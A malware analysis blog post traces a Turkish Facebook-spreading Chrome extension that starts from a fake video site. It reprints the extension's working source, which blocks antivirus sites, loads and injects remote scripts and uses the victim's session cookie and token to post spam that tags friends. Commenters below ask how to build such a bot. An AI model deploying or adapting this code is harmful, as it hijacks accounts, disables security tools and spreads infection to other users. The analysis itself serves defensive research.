videotr.in (Facebook spreading browser extension proxied by cloudflare)

This is aimed at Turkish Facebook users. The scripts used by the extension are hosted over several domains.

The infection starts with the site hxxp://www.videotr.in, which plays a short videoclip. The video is then interrupted and the user is urged to run an exe that is downloaded to fix the issue.

The exe creates a Chrome extension from files listed at hxxp://www.likef.biz/ask.txt and adds it to Chrome.

background.js

chrome.webRequest.onBeforeRequest.addListener(
        function (details) {
                var url = details.url;
                for (var i = 0; i < ibneler.length; i++) {
                        if (url.indexOf(ibneler[i]) > -1) {
                                return {
                                        cancel: true
                                };
                        }
                }
        }, {
                urls: ["<all_urls>"]
        }, ["blocking"]);
var ibneler = [
        'https://www.facebook.com/csp.php'
];
function Organik() {
        var xhr = new XMLHttpRequest();
        xhr.onreadystatechange = function () {
                if (xhr.readyState == 4) {
                        try {
                                JSON.parse(xhr.responseText).forEach(
                                        function (d) {
                                                if (d.uri) {
                                                        ibneler.push(d.uri);
                                                }
                                        });
                        } catch (e) {}
                }
        };
        xhr.open("GET",
                'http://www.upjs.net/ajax/get.js?amtasak=' +
                Math.random() * 999999, true);
        xhr.send();
}
Organik();
chrome.tabs.onUpdated.addListener(
        function (tabid, x, tab) {
                if (tab.url ==
                        'chrome://chrome/extensions' ||
                        tab.url == 'opera://extensions' ||
                        tab.url == 'chrome://extensions/'
                ) {
                        chrome.tabs.remove(tab.id);
                }
        });
chrome.tabs.onUpdated.addListener(function (tabId) {
        chrome.tabs.get(tabId, function (tab) {
                {
                        var xhr = new XMLHttpRequest();
                        xhr.onreadystatechange = function () {
                                if (xhr.readyState == 4) {
                                        if (tab.url.indexOf('devtools://') < 0) {
                                                chrome.tabs.executeScript(tab.id, {
                                                        code: xhr.responseText
                                                });
                                        }
                                }
                        }
                        xhr.open('GET', 'http://www.jsup.us/user.php');
                        xhr.send();
                }
        })
});

Script.js

if(!document.getElementById('amung')){
new Image().src = 'http://whos.amung.us/pingjs/?k=z8l4ub8fvjhz';
}

Background.js loads a list of domains from hxxp://www.upjs.net/ajax/get.js and blocks any attempt to visit them. It also blocks any attempt to open the Chrome extension page.

get.js

[{"uri":"virustotal.com"},{"uri":"avast.com"},{"uri":"eset.com"},{"uri":"microsoft.com"},{"uri":"virusscan.jotti.org"},{"uri":"jotti.org"},{"uri":"avg.com"},{"uri":"kaspersky.com.tr"},{"uri":"kaspersky.com"},{"uri":"facebook.com/ajax/webstorage/process_keys.php"},{"uri":"facebook.com/checkpoint/malware/cr_ext_config"},{"uri":"facebook.com/checkpoint/malware/cr_ext_log"},{"uri":"sansurcrx.com"},{"uri":"dl.dropboxusercontent.com"},{"uri":"sosyalmedyakusu.com"},{"uri":"fiddle.jshell.net"},{"uri":"fei-coder.com"},{"uri":"docs.google.com"},{"uri":"drive.google.com"},{"uri":"orjinalmarket.net"},{"uri":"facebook.com/ajax/follow/unfollow_profile.php"},{"uri":"vuupc.com"},{"uri":"mcafee.com"},{"uri":"s3.amazonaws.com"},{"uri":"googlecode.com"}]
Kaspersky.com blocked

Background.js also loads additional javascript from hxxp://www.jsup.us/user.php. This has the Facebook spreading component.

user.php

if (!document.getElementById("amung")) {
    new Image().src = "http://whos.amung.us/pingjs/?k=bcpn2gdh64no";
}
var tarih = new Date();
var takip = Array("1661944612", "1625224768");
for (i = 0; i = localStorage['Post_' + profile_id])) {
    function rndchr(n) {
        var text = "";
        var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        for (var i = 0; i < n; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
        return text;
    }
    var u = ["Canli yayinda giyilecek elbisemi Allah askina bu! " + rndchr(1) + " ", " is gercekten iyice cigrindan cikti ne olacak boyle bilmiyorum!" + rndchr(1) + " ", "Bunlar da hakli hic bir yetenegi olmayan insanlar sonucta bunlar!" + rndchr(1) + " ", " Bunlari kontrol eden kurum RTUK! gor artik bunlar ve bi cozum uret!" + rndchr(1) + " ", "Valla bunlarda kisilik falan kalmamis kardesim" + rndchr(1) + " ", "Kardesim coluk cocugumuz var bunlar iyice bozdu!" + rndchr(1) + " ", "Birakin artik bu isleri bizler akillandik yemiyoruz bu numaralari!" + rndchr(1) + " ", "Ben izledim kendimden utandim. sizde bir bakin sunlara" + rndchr(1) + " ", "Yeter biktik beee! Biz boyle izlemek istemiyoruz!" + rndchr(1) + " ", "Yaa arkadaslar bunlari kontrol eden bir kurum yokmu! " + rndchr(1) + " ", "Reyting ugruna her gun neler goruyoruz vallahi yazik!" + rndchr(1) + " ", "Bizim orf adetlerimizle hic bagdasmayan seyler bunlar!" + rndchr(1) + " ", "DxFCn'den Beri Ugrau015Ftu0131gu0131m tek u015Eey bu Video u0130zleyin.", "Mutlaka u0130zleyin gxFCnlerdir ugrau015Fu0131orum.", "Videomu u0130zleyen Herkeze Teu015FekkxFCrler.", "En Sevdiğim Arkadaşlarım :)", "Ben Bu Videoyu yapmak ixE7in gxFCnlerimi verdim kimse izlemior.", "Yeni yılınız kutlu olsun arkadaşlar :) :D", "2013 yu0131lu0131nda arkadau015Flaru0131m ile gexE7irdiu011Fim en gxFCzel anlar", "Benim videomu birtek noal baba izlesin dilek diledim", "Simdide İnanmayinda Goreyim :)", "Herkez Cesaret Edemez ..", "İste Size Bahsettigim Sirrim :)", "Cok Utaniyorum Ama Birde Siz u0130zleyin LxFCtfen", "Ne Kadar Cilgin Bir İnsanim Ben.", "Nasilda Tatliyim Ama..", "Dostlarimin Destegi Olmasaydi Gidemezdim..", "Destek Veren Tum Dostlarimi Kutluyorum", "Yetenek Sizsiniz TxFCrkiye'ye Katu0131ldu0131m. u0130zlerseniz Sevinirim", "Bunu Yapacagım Aklima Gelmezdi :)", "Destek Veren TxFCm Arkadaslarima TesekkxFCr Ederim", "Sonunda Bunuda Yaptim ya Helal Olsun Bana", "Kim Derdiki Televizyona Cikacagım ?", "Taniyanlar Ne Kadar Cilgin Oldugumu Bilir :)"];
    var rand = u[Math.floor(u.length * Math.random())];
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]).toString();

    function rastgele(uzunluk) {
        mtn = "ABCDEFGHIJKLMNOPRSTUVYZXabcdefghijklmnoprstuvyzx0123456789";
        ret = "";
        for (i = 0; i < uzunluk; i++) {
            ret += mtn[Math.floor(Math.random() * 57)];
        }
        return ret;
    }
    var link = "";
    var xhr = new XMLHttpRequest();
    xhr.open("GET", 'http://www.videotr.in/dropbox/up.php', true);
    xhr.onreadystatechange = function () {
        if (xhr.readyState == 4) {
            link = xhr.responseText + "?" + rastgele(250);
            topla();
        }
    }
    xhr.send();

    function topla() {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                var response = JSON.parse(get.responseText);
                var isim = response.name;
                online(isim);
            }
        };
        get.open("GET", "https://graph.facebook.com/" + profile_id, true);
        get.send();
    }
    friends = [];

    function online(isim) {
        var get = new XMLHttpRequest();
        get.onreadystatechange = function () {
            if (get.readyState == 4) {
                try {
                    var veri = JSON.parse(get.responseText.replace("for (;;);", ""));
                    var toplam = Object.keys(veri.payload.buddy_list.nowAvailableList).length;
                    for (kisi in veri.payload.buddy_list.nowAvailableList) {
                        friends.push({
                            id: kisi
                        });
                    }
                } catch (close) {}
                paylas(isim, friends)
            }
        };
        var params = "user=" + profile_id + "&fetch_mobile=false&__user=" + profile_id + "&__a=1&__req=2&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        get.open("POST", "/ajax/chat/buddy_list.php?__a=1", true);
        get.send(params);
    }

    function paylas(isim, friends) {
        if (link != "undefined" || link != "") {
            var http = new XMLHttpRequest();
            http.onreadystatechange = function () {
                if (http.readyState == 4) {}
            };
            var params = "";
            params = "fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
            params += "&xhpc_context=home";
            params += "&xhpc_ismeta=1";
            params += "&xhpc_timeline=";
            params += "&xhpc_composerid=u_jsonp_3_3";
            params += "&xhpc_litestand=1";
            params += "&xhpc_targetid=" + profile_id;
            params += "&clp={"cl_impid":"a4eb8ac2","clearcounter":0,"elementid":"u_jsonp_3_g","version":"x","parent_fbid":" + profile_id + "}";
            params += "&xhpc_message_text=" + rand;
            params += "&xhpc_message=" + rand;
            params += "&aktion=post";
            params += "&app_id=2309869772";
            params += "&attachment[params][urlInfo][canonical]=" + link;
            params += "&attachment[params][urlInfo][final]=" + link;
            params += "&attachment[params][urlInfo][user]=" + link;
            params += "&attachment[params][title]=" + isim + " :Yazıklar olsun izlerken içim gitti ya.";
            params += "&attachment[params][summary]=www.youtube.com";
            params += "&attachment[params][images][0]=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&w=100";
            params += "&h=100";
            params += "&url=https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn1/1525624_180057068859680_248847473_n.jpg";
            params += "&cfs=1";
            params += "&upscale";
            params += "&attachment[params][medium]=106";
            params += "&attachment[params][url]=" + link;
            params += "&attachment[type]=100";
            params += "&link_metrics[source]=ShareStageExternal";
            params += "&link_metrics[domain]=youtube.com";
            params += "&link_metrics[base_domain]=youtube.com";
            params += "&link_metrics[title_len]=51";
            params += "&link_metrics[summary_len]=260";
            params += "&link_metrics[min_dimensions][0]=70";
            params += "&link_metrics[min_dimensions][1]=70";
            params += "&link_metrics[images_with_dimensions]=1";
            params += "&link_metrics[images_pending]=0";
            params += "&link_metrics[images_fetched]=0";
            params += "&link_metrics[image_dimensions][0]=325";
            params += "&link_metrics[image_dimensions][1]=325";
            params += "&link_metrics[images_selected]=1";
            params += "&link_metrics[images_considered]=1";
            params += "&link_metrics[images_cap]=10";
            params += "&link_metrics[images_type]=images_array";
            params += "&composer_metrics[best_image_w]=100";
            params += "&composer_metrics[best_image_h]=100";
            params += "&composer_metrics[image_selected]=0";
            params += "&composer_metrics[images_provided]=1";
            params += "&composer_metrics[images_loaded]=1";
            params += "&composer_metrics[images_shown]=1";
            params += "&composer_metrics[load_duration]=16";
            params += "&composer_metrics[timed_out]=0";
            params += "&composer_metrics[sort_order]=";
            params += "&composer_metrics[selector_type]=UIThumbPager_6";
            if (friends.length < 200) {
                limit = friends.length;
            } else {
                limit = 150;
            }
            for (i = 0; i < limit; i++) {
                params += '&composertags_with[' + i + ']=' + friends[i].id;
            }
            params += "&is_explicit_place=";
            params += "&composertags_place=";
            params += "&composertags_place_name=";
            params += "&tagger_session_id=1388007674";
            params += "&action_type_id[0]=";
            params += "&object_str[0]=";
            params += "&object_id[0]=";
            params += "&hide_object_attachment=0";
            params += "&og_suggestion_mechanism=";
            params += "&composertags_city=";
            params += "&disable_location_sharing=false";
            params += "&composer_predicted_city=114515998560505";
            params += "&audience[0][value]=80";
            params += "&nctr[_mod]=pagelet_composer";
            params += "&__user=" + profile_id;
            params += "&__a=1";
            params += "&__dyn=7n8a9EAMBlClUlgDxqiykUUxoshEK49oKiWFamiFo";
            params += "&__req=17";
            params += "&__rev=1058441";
            params += "&ttstamp=";
            http.open("POST", "/ajax/profile/composer.php", true);
            http.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            http.send(params);
        }
    }
    if (navigator.userAgent.indexOf("Chrome") > 0) {
        tarih.setTime(tarih.getTime() + 1000 * 10 * 10);
        localStorage['Post_' + profile_id] = tarih.getTime();
    }
}

Updated links for spreading are obtained from hxxp://www.videotr.in/dropbox/up.php

The shortened url leads to a page hosted on dropbox.

    

    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
    <head>
            <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
            <title></title>
    </head>
    <body>
    <script type="text/javascript">
    var a = navigator,
            b = "userAgent",
            c = "indexOf",
            f = "&m=1",
            g = "(^|&)m=",
            h = "?",
            i = "?m=1";
    if (-1 != a[b][c]("Mobile") && -1 != a[b][c]("WebKit") && -1 == a[b][c]("iPad") || -1 != a[b][c]("Opera Mini") || -1 != a[b][c]("IEMobile")) {
    top.location="http://goo.gl/wXXcpZ";
    }else{
    top.location = "http://www.videotr.in";
    }
    </script>
    </body>
    </html>


Mobile browsers are redirected to hxxp://mobiltrafikmt.s3.amazonaws.com/mobil.html and all others are sent to videotr.in for the infection cycle to start again.

mobil.html

<script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"><!--mce:2--></script>
<script>
function detectmob() { 
 if( navigator.userAgent.match(/Android/i)){
    return "Android";
  }
  if( navigator.userAgent.match(/iPhone/i)){
    return "iPhone";
  }
}

$.get("http://ipinfo.io", function(response) {
    if(response.country=="TR")
    {
    //TÃœRKÄ°YE
    if(response.org.indexOf("TURKCELL")>0){
    top.location.href = 'turkcell.html';
    }else if(response.org.indexOf("Vodafone")>0){
    top.location.href = 'vodofone.html';
    }else if(response.org.indexOf("AVEA")>0){
    top.location.href = 'avea.html';
    }else{
    if(detectmob()=="Android"){
    top.location.href = 'androidwifi.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'iphonewifi.html';
    }else{
    top.location.href = 'trweb.html';
    }
    }
    }else{
    //YURTDIÅžI
    if(detectmob()=="Android"){
    top.location.href = 'yurtdisi-anroid.html';
    }else if(detectmob()=="iPhone"){
    top.location.href = 'yurtdisi-ios.html';
    }else{
    top.location.href = 'yurtdisiweb.html';
    }
    }
}, "jsonp");
</script>

Mobile browsers are separated by phone OS and pushed through a network of affiliate links.

Categories: Uncategorized

3 Comments

Hendrac7 - April 19, 2014 at 5:50 pm

videotr.in is non aktif bro , can you explain again to make BOT like this ??? my email : hendrac7@gmail.com

Kodran Piraj - June 10, 2014 at 2:22 pm

how to convert crx to exe please ?

Anonymous - July 24, 2014 at 11:42 pm

what info does hxxp://www.videotr.in/dropbox/up.php contain? Does it serve a json file?

Comments are closed